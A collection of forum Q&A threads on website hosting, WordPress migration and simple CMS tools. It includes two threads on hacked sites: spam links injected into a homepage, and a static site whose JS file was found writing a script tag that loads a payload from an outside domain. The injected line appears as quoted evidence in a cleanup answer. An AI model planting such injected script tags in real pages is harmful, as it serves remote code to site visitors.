Helping a friend's company with their website. They have a random bit of code appearing on a bar near the top of what looks to be just on the homepage:
http://snakeoilcocktail.com/
The line is here according to the source:
<div class='dc'>You take that to bank:same day loans. Buy there a atv armor set</div>
I used a plugin to do a String check to find out where the line is but I can't see where it's located to edit it. Any help would be greatly appreciated.
Thanks!
Looks like there's some malware injected on the site. In the top navigation under "Beverage Catering and Event Mixology" there's what looks like some malicious JS code that's adding a div with a class of "dc". Not sure what your setup is, but I'd advise checking into this plugin: https://wordpress.org/plugins/sucuri-scanner/
It'll tell you if any of the core Wordpress files have been hacked, or if it recognizes any files that aren't part of WP.
They have a free quick scanner, check this out: https://sitecheck.sucuri.net/results/snakeoilcocktail.com/
Revolution Slider is a big risk :) (Note the comment on Sucuri) It's supposedly been patched but they ran into a huge security issue where thousands of WP sites were infected. Happened to a couple of sites I took over as well - I completely removed it.
In other words, if you have to keep the Revolution Slider plugin, update it ASAP. It introduces a vulnerability that allows hackers to upload arbitrary files to your site - bad news. They often upload something that gives them read access to the wp-config.php file so they can get into the database as well. (http://securityaffairs.co/wordpress/35431/cyber-crime/revslider-plugin-vulnerable.html)
It has to be somewhere! So either one of your plugins is outputting that code or it has been hacked into your theme.
First, try to deactivate all the plugins one after each other to find out if a plugin causes that issue. If that doesn't help, you may need to go through each file in the theme until you found the target. Also notice that the code could look different in a file than the code which you have posted in your question.
Your website must gave been infected with a malware/adware of some sort. This usually happens when you are using a free hosting service. Check whether your friend is using a free hosting service to host his website. Some of those providers inject advertising content into free hosted websites to make revenue.
If this is not the case,
Restore to previous backup
Disable any plug-ins used on the website
Check through the code for any suspicious lines.
Delete all the files on the web server if possible and try re-uploading
the source files.
Migrate to a hosting provider such as goDaddy, AWS etc for security of
your website.
Related
So I do not quite know if THIS website is the actual place to ask this question so please forgive me if it does not cooperate with question asking standards.
I am currently making a website with HTML and I am using Brackets as my editor. Now once I purchase a domain and I post my website and it is finally on the open web ready for commercial use, what if I need to change some information or add some pages?
Will I have to just open up the code using Brackets, edit it, and somehow replace it in the place where I put it in the first place? Or is there some sort of program that I can use that can update this?
I am just asking for suggestions. Thank you.
This is a very broad question and will likely be removed, however I'll point you in the right direction.
The exact steps to update your website will depend on your web host and the server you have set up, but in general you want an FTP/SFTP client that will connect to your server and let you upload files (I recommend Filezilla). All you do is connect to the IP address of your website and log in, then upload the new versions of the files to your website. It may take a few minutes to propagate and you may have to refresh the page, however that's all there is to it. For further help, just Google a tutorial on Filezilla.
I created my wordpress site, then I transferred all my files and sql over to a host using hostgator.com. In my pc, the website was located in xampp\htdocs\mywebsite. I transferred all the files inside of \mywebsite to public_html using a ftp client, and the website worked, however it just looked like a basic html website, no images or anything like it should be. I then placed all the files inside of a folder called mywebsite inside of public_html, and then it worked fine. I'm guessing I need to reconfigure some files in order to get it to work from just mywebsite.com, instead of mywebsite.com/mywebsite.
The only files I have modified so far is obviously the wp-config. I apologize for this lengthy question, and if this was hard to understand, but I would really appreciate any help given. Any help is extremely appreciated, Thanks.
Here is the wordpress codex regarding moving your website: http://codex.wordpress.org/Moving_WordPress
You are going to need to use this search and replace tool, which is also mentioned in the above link.
Also remember to change the links in Settings -> General in the wordpress dashboard.
You might consider the Duplicator plug-in if you have control of both databases. It makes things pretty easy.
If you end up doing things the long way, make sure that the info in both wp-config files matches.
I am learning the html course from the available tutorials on the internet. And with that knowledge I have developed some html files and I believe there is more to go. These files consist of our old school friends and their present condition and what they're doing. I have created a bunch of html files. Like I have created a website for now named as www.mypage.com
Arjun
So in the href I'm just giving the path but those files are in my desktop pc itself. How do I put them on internet and share with my friends who are living somewhere out of this town. I want to reunite all of my school friends using these files. But where do I upload them and make it like a webiste to my friends? Is there any free way to do that? Or any possible way to reach it.
And I'm saying sorry if the question is not for the tag I mentioned. Please let me know and I remove the tag. I don't know what is the link to wikiposts to share my views. If you know then let me see the link. Thank you.
Find a web hosting service (Google knows lots)
Sign up
Follow their instructions
Arjun
And use relative uris
I use http://webhosting.uk.com ... for about £32 a year you get asp.net hosting and access to sql server.
then you simply ftp up to your website something like this (using windows explorer) ....
ftp://mysite.com <-- not a real link
... that would then open up the remote server as if it was a local folder so you could drag and drop your files straight over.
there's an online chat link on the top right of the homepage, the support staff will walk you through getting setup.
don't forget though ... the cost of the domain name that's the bit that turns your server ip address in to stuff like google.co.uk ... I highly recommend them.
I shall just expand on Quentin's answer, because it is clear that you are new.
What you need is a web hosting service. This is a service which hosts your html pages, meaning stores them in their own computers, and also displays them to the world as webpages. Web hosting services are usually paid, but there are some excellent free services if your content is not too big. A simple and free service that I would recommend is Google Sites. You could also try Google App Engine, where you have more freedom and control over your content, but for the same reason it is a little more advanced. But since you are learning html, I believe it is a wise idea to learn more about these services and related concepts.
When you upload your files, the html links need to be changed. They can no longer point to files in your hard drive. When you upload these files, there will be a directory structure in it. All you need to do is place hyperlinks with relative addresses.
And about what your website will be called, www.whatever.com, that is quite another business. For that, you need to register your own domain name, for which you must pay. If you don't want to, then your website will be labelled something under the hosting service domain name. This forum is not adequate to go into a more elaborate explanation of all this, but I think I have mentioned all the key terms, so do some research!
here's my website:
www.newportclassic.com
do you know of any free, easy to use, content management systems, that will allow me to simply edit the text on my site without having to download the file, open the file, edit the code, save the file, upload the file ???????
I know of a few CMS's that have done well, here are two of them.
Wordpress - free - http://wordpress.org/ - 3.0 is coming soon
Perch - paid - http://grabaperch.com/ - very light and easy
Wikipedia has a very good list of content management systems broken down by language and cost (open source/proprietary) and DBMS. Most of the ones I've used/evaluated in the past have been .NET based, such as DotNetNuke. Pretty much any CMS will give you the ability to edit your HTML without changing any files on your web server. If you're going for simplicity, the Wikipedia list has several that use a flat file instead of a database, so I would start there: http://en.wikipedia.org/wiki/List_of_content_management_systems#File_.2F_Flat_file
As an alternative to installing a CMS on your server, you might be interested in a service like CushyCMS. It allows you to specify what parts of your page are editable by setting an appropriate class in each editable div tag. Then to edit the contents of those div blocks, you log in to the CushyCMS site and make your changes right there. CushyCMS connects via FTP to the server for you and updates the HTML page.
You can use emacs -- it has a mode (tramp) where you can open, edit and save remote files as if they were on your local machine. This makes it really easy to edit files on a webserver.
haven't used it myself but i've heard Surreal CMS is quite good and easy to setup. Here's a tutorial to get you started.
In terms of user friendliness zimplit is hard to beat.
Try their demo.
You can literally edit your website with a wysiwyg interface inside your browser.
Refinery HQ is probably the easiest way to create, edit and update your website. You can upload images and files as you describe in your question.
You can also connect it to your own domain (it's a hosted service). So you'd be able to hook the site you create up to newportclassic.com
The home-page of our static html website http://www.iffort.com is transferring data from a mysterious website rawalrohi.com. You can check this by going to iffort.com and noticing the footer there. It says transferring data from rawalrohi.com.
From our side we did the following things to rectify the issue
a.) Analyze the source-code of all pages. We checked the code and found out that a script src=http://rawalrohi.com/images/ART.php was inserted in all pages. We removed this script from all the ‘html’ pages of the website
b.)Next we spoke to the hosting company, they said they can provide us a back up of the site. We have the backup but haven’t used it to restore the site.
c.)Lastly, we have changed the FTP password because we were told that somebody could have hacked our FTP password.
Despite doing this the home-page still says transferring data from rawalrohi.com. The view source doesn’t reveal the URL. This is slowing down our website.
Any help is greatly appreciated.
Your page references a file called "js/hyperlinked_Images.js"
Have a look at this file, right near the bottom:
...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
Now if you'll excuse me, I'm go to run a quick AV scan on my system ;)
make sure you don't use one FTP account for everything, control the FTP user control, it will help you to manage your website.
I've seen similar behaviour a while back. In that specific case, the ftp-password was compromised: it was read from the clients desktop PC by malware that collected stored ftp passwords.
We found this out only after the password was changed and compromised again within a few days.
So make sure you scan all machines that 'know' the ftp password with a decent AV-scanner.
I just recently saw this on a clients website, a different url but same type of code injection was in all of their files. To fix the problem, I download the site and I used Visual Studio to do a sitewide "find & replace" on the string. This solved the problem for me. I suggest you do something similar for all files, you might have missed one. My clients site had html/htm/aspx files that were all infected, ISP made the same statement that the FTP password was probably compromised...
Make sure you on your antivirus. Whenever the your website loading funny external script like adware, spyware, your antivirus will alert you.
I didn't scan your site, but if you're using any standard software on your website, like: WordPress, Drupal, Joomla, etc. then you need to keep that updated at all times. Subscribe to their security alerts and whenever you see an update, drop everything you're doing and update.
Hackers are constantly scanning the internet for vulnerable websites. It only takes them a fraction of a second on a vulnerable site to infect it.
Also, keep all the plugins, add-ons, components, modules, contributions, etc. updated as well.
Otherwise, you'll be cleaning this over and over again.